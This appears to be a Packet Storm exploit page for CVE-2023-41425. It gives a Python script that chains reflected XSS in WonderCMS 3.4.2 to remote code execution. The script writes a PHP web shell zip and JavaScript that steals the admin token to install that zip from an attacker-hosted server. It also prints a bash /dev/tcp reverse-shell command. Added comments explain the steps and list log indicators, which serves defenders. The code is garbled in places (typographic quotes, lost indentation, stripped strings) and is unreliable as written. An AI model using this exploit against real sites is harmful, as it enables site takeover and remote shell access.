Exploit Details
Basic Information
| Exploit Title | WonderCMS 3.4.2 Cross Site Scripting / Code Execution |
|---|---|
| Exploit ID | PACKETSTORM:190575 |
| Type | packetstorm |
| Published | 2025-04-21T00:00:00 |
| Modified | 2025-04-21T00:00:00 |
CVSS Information
| CVSS Score | 6.1 |
|---|---|
| Severity | MEDIUM |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
CVE Information
- CVE-2023-41425
Exploit Description
Exploit Code
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425
import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored
def main():
# Proof-of-concept for CVE-2023-41425 (WonderCMS 3.4.2, see header): a script
# tag injected via the loginURL page is made to run in a logged-in admin's
# browser, and that page reads the admin's form token and calls the CMS's
# own installModule endpoint with an attacker-hosted zip (lines below).
# NOTE(review): as rendered here the code is not runnable — quotes were
# converted to typographic quotes, all indentation was lost, and HTML/PHP
# tags inside string literals were stripped by the page renderer. Nothing
# stripped is reconstructed in these comments.
# Defensive reading: the request shapes this script emits (an installModule
# call whose URL parameter points at an external http:// host, followed by
# requests to a freshly created *.php under themes/) are the log indicators
# to look for; the fix is the vendor patch for CVE-2023-41425.
# Three required CLI options: the target's loginURL page, and the IP/port of
# the attacker-controlled HTTP server that will serve the zip and the .js.
parser = argparse.ArgumentParser(description=”Exploit Wonder CMS v3.4.2
XSS to RCE”, formatter_class=RawTextHelpFormatter)
parser.add_argument(“–url”, required=True, help=”Target URL of
loginURL (Example: http://sea.htb/loginURL)”)
parser.add_argument(“–xip”, required=True, help=”IP for HTTP web
server that hosts the malicious .js file”)
parser.add_argument(“–xport”, required=True, help=”Port for HTTP web
server that hosts the malicious .js file”)
args = parser.parse_args()
# target_login_url is assigned but never read below.
target_login_url = args.url
# Derive scheme://host from the login URL by splitting on '/' (index 0 is
# the scheme with its trailing colon, index 2 the host:port part).
target_split = args.url.split(‘/’)
target_url = target_split[0] + ‘//’ + target_split[2]
# Web Shell
print(“[+] Creating PHP Web Shell”)
# Build ./malicious.zip containing malicious/malicious.php, then remove the
# working directory. The PHP file's content on the next f.write line was
# stripped by the page renderer (appears as an empty string here).
if not os.path.exists(‘malicious’):
os.mkdir(‘malicious’)
with open (‘malicious/malicious.php’, ‘w’) as f:
f.write(‘‘)
with zipfile.ZipFile(‘./malicious.zip’, ‘w’) as z:
z.write(‘malicious/malicious.php’)
os.remove(‘malicious/malicious.php’)
os.rmdir(‘malicious’)
else:
# An existing directory is reported but no zip is built; the script still
# continues to the HTTP-server step (no early exit).
print(colored(“[!] Directory malicious already exists!”, ‘yellow’))
# Malicious .js
# JavaScript that runs in the victim admin's session: it reads the page's
# [name="token"] value (the CMS form token) and issues a credentialed GET to
# ?installModule=... pointing at the attacker host, with type=themes. Note
# the request names directoryName=pwned while the paths printed further down
# use themes/malicious/ — which one the server honours cannot be told from
# this listing.
js = f”’var token =
document.querySelectorAll(‘[name=”token”]’)[0].value;
var module_url =
“{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=”
+ token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open(“GET”, module_url);
xhr.send();”’
print(“[+] Writing malicious.js”)
with open(‘malicious.js’, ‘w’) as f:
f.write(js)
# Reflected-XSS URL: loginURL is rewritten to index.php?page=loginURL? and a
# closing-quote/tag sequence referencing http://<xip>:<xport>/malicious.js is
# appended. The tag itself was stripped by the page renderer, which is why
# the string below looks truncated.
xss_payload = args.url.replace(“loginURL”,
“index.php?page=loginURL?”)+”\”>
“+args.xip+”:”+args.xport+”/malicious.js\”>
# Two print calls fused onto one line in this rendering (not valid Python).
print(“[+] XSS Payload:”)print(colored(f”{xss_payload}”, ‘red’))
print(“[+] Web Shell can be accessed once .zip file has been
requested:”)
# Informational output only; the f-string's tail after ?cmd= was stripped by
# the renderer.
print(colored(f”{target_url}/themes/malicious/malicious.php?cmd=
‘red’))
print(“[+] To get a reverse shell connection run the following:”)
# Informational output only; the host/port inside /dev/tcp/ was stripped by
# the renderer.
print(colored(f”curl -s ‘{target_url}/themes/malicious/malicious.php’
–get –data-urlencode \”cmd=bash -c ‘bash -i >& /dev/tcp/
0>&1’\” “, ‘yellow’))
print(“[+] Starting HTTP server”)
# Serve the current directory (malicious.zip and malicious.js) with the
# stdlib http.server bound to xip:xport; blocks until interrupted.
subprocess.run([“python3”, “-m”, “http.server”, “-b”, args.xip,
args.xport])
# Script entry point. As with the rest of this rendering, the typographic
# quotes mean this line does not parse as written.
if __name__ == “__main__”:
main()